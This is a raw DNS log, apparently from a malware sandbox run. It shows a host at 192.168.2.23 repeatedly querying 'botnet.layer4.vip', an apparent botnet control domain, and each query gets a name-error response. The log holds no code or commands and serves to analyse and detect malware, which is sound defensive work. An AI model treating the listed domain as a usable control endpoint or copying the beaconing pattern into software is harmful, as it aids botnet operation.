                                  Apr 9, 2023 03:31:15.410406113 CEST8.8.8.8192.168.2.230xbcaeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.434595108 CEST8.8.8.8192.168.2.230xbcaeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.474714994 CEST8.8.8.8192.168.2.230x3749Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.564055920 CEST8.8.8.8192.168.2.230x3749Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.588381052 CEST8.8.8.8192.168.2.230x6c63Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.661714077 CEST8.8.8.8192.168.2.230x6c63Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.738575935 CEST8.8.8.8192.168.2.230x9507Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.827521086 CEST8.8.8.8192.168.2.230x7531Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.851778030 CEST8.8.8.8192.168.2.230x7531Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.883224964 CEST8.8.8.8192.168.2.230x7531Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.938908100 CEST8.8.8.8192.168.2.230xfcfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.963241100 CEST8.8.8.8192.168.2.230xfcfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:15.987737894 CEST8.8.8.8192.168.2.230xfcfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.003345013 CEST8.8.8.8192.168.2.230xfcfName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.019083023 CEST8.8.8.8192.168.2.230x90d3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.043550014 CEST8.8.8.8192.168.2.230x90d3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.067766905 CEST8.8.8.8192.168.2.230x90d3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.132646084 CEST8.8.8.8192.168.2.230xe0d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.148576021 CEST8.8.8.8192.168.2.230xe0d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.188812017 CEST8.8.8.8192.168.2.230xe0d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.213001013 CEST8.8.8.8192.168.2.230xe0d7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.228669882 CEST8.8.8.8192.168.2.230xd08cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.253004074 CEST8.8.8.8192.168.2.230xd08cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.268616915 CEST8.8.8.8192.168.2.230xd08cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.284172058 CEST8.8.8.8192.168.2.230xd08cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.300183058 CEST8.8.8.8192.168.2.230xd08cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.315973997 CEST8.8.8.8192.168.2.230x61b7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.396884918 CEST8.8.8.8192.168.2.230x61b7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.446002960 CEST8.8.8.8192.168.2.230x5c77Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.461652040 CEST8.8.8.8192.168.2.230x5c77Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.541150093 CEST8.8.8.8192.168.2.230x854fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.565511942 CEST8.8.8.8192.168.2.230x854fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.612160921 CEST8.8.8.8192.168.2.230xaea7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.660633087 CEST8.8.8.8192.168.2.230xaea7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.709260941 CEST8.8.8.8192.168.2.230xaea7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.777664900 CEST8.8.8.8192.168.2.230x45a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.802160978 CEST8.8.8.8192.168.2.230x45a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.913419008 CEST8.8.8.8192.168.2.230xf463Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:16.928796053 CEST8.8.8.8192.168.2.230xf463Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.015832901 CEST8.8.8.8192.168.2.230x84eeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.031791925 CEST8.8.8.8192.168.2.230x84eeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.056092024 CEST8.8.8.8192.168.2.230x84eeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.072186947 CEST8.8.8.8192.168.2.230x84eeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.088191032 CEST8.8.8.8192.168.2.230x6f5aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.103682995 CEST8.8.8.8192.168.2.230x6f5aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.144118071 CEST8.8.8.8192.168.2.230x6f5aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.160092115 CEST8.8.8.8192.168.2.230x6f5aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.208990097 CEST8.8.8.8192.168.2.230x3e69Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.258040905 CEST8.8.8.8192.168.2.230x3e69Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.363529921 CEST8.8.8.8192.168.2.230xbdb2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.387844086 CEST8.8.8.8192.168.2.230xbdb2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.404001951 CEST8.8.8.8192.168.2.230xcc35Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.460159063 CEST8.8.8.8192.168.2.230xcc35Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.516757011 CEST8.8.8.8192.168.2.230x37f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.580950022 CEST8.8.8.8192.168.2.230x37f7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.645273924 CEST8.8.8.8192.168.2.230x60abName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.725344896 CEST8.8.8.8192.168.2.230x3a3bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.740860939 CEST8.8.8.8192.168.2.230x3a3bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.765328884 CEST8.8.8.8192.168.2.230x3a3bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.797218084 CEST8.8.8.8192.168.2.230xfbeaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.828572035 CEST8.8.8.8192.168.2.230xfbeaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.885185003 CEST8.8.8.8192.168.2.230x9be3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.917402029 CEST8.8.8.8192.168.2.230x9be3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.933687925 CEST8.8.8.8192.168.2.230x9be3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:17.982949972 CEST8.8.8.8192.168.2.230xa309Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.007486105 CEST8.8.8.8192.168.2.230xa309Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.071988106 CEST8.8.8.8192.168.2.230xa309Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.112240076 CEST8.8.8.8192.168.2.230xe2a2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.168484926 CEST8.8.8.8192.168.2.230xe2a2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.217186928 CEST8.8.8.8192.168.2.230x24fcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.299034119 CEST8.8.8.8192.168.2.230xdd23Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.323436975 CEST8.8.8.8192.168.2.230xdd23Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.347978115 CEST8.8.8.8192.168.2.230xdd23Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.363673925 CEST8.8.8.8192.168.2.230xdd23Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.404453039 CEST8.8.8.8192.168.2.230xbc55Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.445183039 CEST8.8.8.8192.168.2.230xbc55Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.518877983 CEST8.8.8.8192.168.2.230x6450Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.535089016 CEST8.8.8.8192.168.2.230x6450Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.616414070 CEST8.8.8.8192.168.2.230xa790Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.698304892 CEST8.8.8.8192.168.2.230xa790Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.732975960 CEST8.8.8.8192.168.2.230x2f28Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.749078989 CEST8.8.8.8192.168.2.230x2f28Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.797920942 CEST8.8.8.8192.168.2.230x2f28Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.839098930 CEST8.8.8.8192.168.2.230xa354Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.879787922 CEST8.8.8.8192.168.2.230xa354Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:18.929302931 CEST8.8.8.8192.168.2.230x2819Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.001705885 CEST8.8.8.8192.168.2.230x2819Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.026530027 CEST8.8.8.8192.168.2.230xd62bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.066992998 CEST8.8.8.8192.168.2.230xd62bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.091365099 CEST8.8.8.8192.168.2.230xd62bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.116142988 CEST8.8.8.8192.168.2.230xd62bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.131927013 CEST8.8.8.8192.168.2.230xfc1fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.180963039 CEST8.8.8.8192.168.2.230xfc1fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.278657913 CEST8.8.8.8192.168.2.230x5d5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.327773094 CEST8.8.8.8192.168.2.230x5d5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.359910965 CEST8.8.8.8192.168.2.230xd63aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.399904013 CEST8.8.8.8192.168.2.230xd63aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.415488005 CEST8.8.8.8192.168.2.230xd63aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.513693094 CEST8.8.8.8192.168.2.230x7245Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.538235903 CEST8.8.8.8192.168.2.230x7245Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.563049078 CEST8.8.8.8192.168.2.230x9578Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.578599930 CEST8.8.8.8192.168.2.230x9578Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.618872881 CEST8.8.8.8192.168.2.230x9578Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.634404898 CEST8.8.8.8192.168.2.230x9578Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.666202068 CEST8.8.8.8192.168.2.230xe26Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.715002060 CEST8.8.8.8192.168.2.230xe26Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.730638981 CEST8.8.8.8192.168.2.230xe26Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.755141973 CEST8.8.8.8192.168.2.230x8435Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.795490980 CEST8.8.8.8192.168.2.230x8435Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.811091900 CEST8.8.8.8192.168.2.230x8435Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.859875917 CEST8.8.8.8192.168.2.230x7b19Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.884424925 CEST8.8.8.8192.168.2.230x7b19Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:19.899972916 CEST8.8.8.8192.168.2.230x7b19Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.021773100 CEST8.8.8.8192.168.2.230xbfddName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.081497908 CEST8.8.8.8192.168.2.230xcad3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.105597019 CEST8.8.8.8192.168.2.230xcad3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.247211933 CEST8.8.8.8192.168.2.230xdcfaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.311347008 CEST8.8.8.8192.168.2.230x4170Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.327207088 CEST8.8.8.8192.168.2.230x4170Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.375593901 CEST8.8.8.8192.168.2.230x8937Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.399717093 CEST8.8.8.8192.168.2.230x8937Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.455137014 CEST8.8.8.8192.168.2.230x8937Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.486619949 CEST8.8.8.8192.168.2.230xd168Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.550968885 CEST8.8.8.8192.168.2.230xd168Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.575282097 CEST8.8.8.8192.168.2.230xb1dcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.591078997 CEST8.8.8.8192.168.2.230xb1dcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.622277021 CEST8.8.8.8192.168.2.230xb1dcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.646759987 CEST8.8.8.8192.168.2.230xb1dcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.671372890 CEST8.8.8.8192.168.2.230xf3dbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.726510048 CEST8.8.8.8192.168.2.230xf3dbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.822231054 CEST8.8.8.8192.168.2.230x6d70Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.846271038 CEST8.8.8.8192.168.2.230x6d70Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.870779991 CEST8.8.8.8192.168.2.230xac3bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:20.959614038 CEST8.8.8.8192.168.2.230xac3bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.113271952 CEST8.8.8.8192.168.2.230x391Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.129272938 CEST8.8.8.8192.168.2.230x391Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.169364929 CEST8.8.8.8192.168.2.230x391Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.218142033 CEST8.8.8.8192.168.2.230xc41aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.249664068 CEST8.8.8.8192.168.2.230xc41aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.329999924 CEST8.8.8.8192.168.2.230x70b6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.354501009 CEST8.8.8.8192.168.2.230x70b6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.385921001 CEST8.8.8.8192.168.2.230xc81cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.410499096 CEST8.8.8.8192.168.2.230xc81cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.434746981 CEST8.8.8.8192.168.2.230xc81cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.531869888 CEST8.8.8.8192.168.2.230xdb1cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.571790934 CEST8.8.8.8192.168.2.230xdb1cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.620412111 CEST8.8.8.8192.168.2.230x846dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.644970894 CEST8.8.8.8192.168.2.230x846dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.694443941 CEST8.8.8.8192.168.2.230x846dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.710434914 CEST8.8.8.8192.168.2.230x846dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.810513973 CEST8.8.8.8192.168.2.230xc8cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.834665060 CEST8.8.8.8192.168.2.230x1264Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.850377083 CEST8.8.8.8192.168.2.230x1264Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.874809027 CEST8.8.8.8192.168.2.230x1264Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.898976088 CEST8.8.8.8192.168.2.230x1264Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.923437119 CEST8.8.8.8192.168.2.230x1264Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:21.954957008 CEST8.8.8.8192.168.2.230x98aeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.010778904 CEST8.8.8.8192.168.2.230x98aeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.050627947 CEST8.8.8.8192.168.2.230x2c8aName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.235153913 CEST8.8.8.8192.168.2.230x802fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.307621956 CEST8.8.8.8192.168.2.230x802fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.332103968 CEST8.8.8.8192.168.2.230x802fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.347628117 CEST8.8.8.8192.168.2.230x3666Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.378895044 CEST8.8.8.8192.168.2.230x3666Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.418656111 CEST8.8.8.8192.168.2.230x3666Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.443325996 CEST8.8.8.8192.168.2.230x39fcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.563791037 CEST8.8.8.8192.168.2.230xc265Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.628175974 CEST8.8.8.8192.168.2.230xc265Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.708085060 CEST8.8.8.8192.168.2.230xcaa6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.734808922 CEST8.8.8.8192.168.2.230xcaa6Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.774985075 CEST8.8.8.8192.168.2.230xd5b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.790879011 CEST8.8.8.8192.168.2.230xd5b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.806404114 CEST8.8.8.8192.168.2.230xd5b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.830852032 CEST8.8.8.8192.168.2.230xd5b9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.879458904 CEST8.8.8.8192.168.2.230x9de1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.950987101 CEST8.8.8.8192.168.2.230x7754Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:22.975089073 CEST8.8.8.8192.168.2.230x7754Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.023294926 CEST8.8.8.8192.168.2.230x7754Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.047342062 CEST8.8.8.8192.168.2.230x7754Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.063251972 CEST8.8.8.8192.168.2.230xd3ddName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.079144001 CEST8.8.8.8192.168.2.230xd3ddName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.154140949 CEST8.8.8.8192.168.2.230xd3ddName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.170294046 CEST8.8.8.8192.168.2.230x84a5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.186213970 CEST8.8.8.8192.168.2.230x84a5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.251295090 CEST8.8.8.8192.168.2.230x84a5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:23.291615009 CEST8.8.8.8192.168.2.230x5090Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
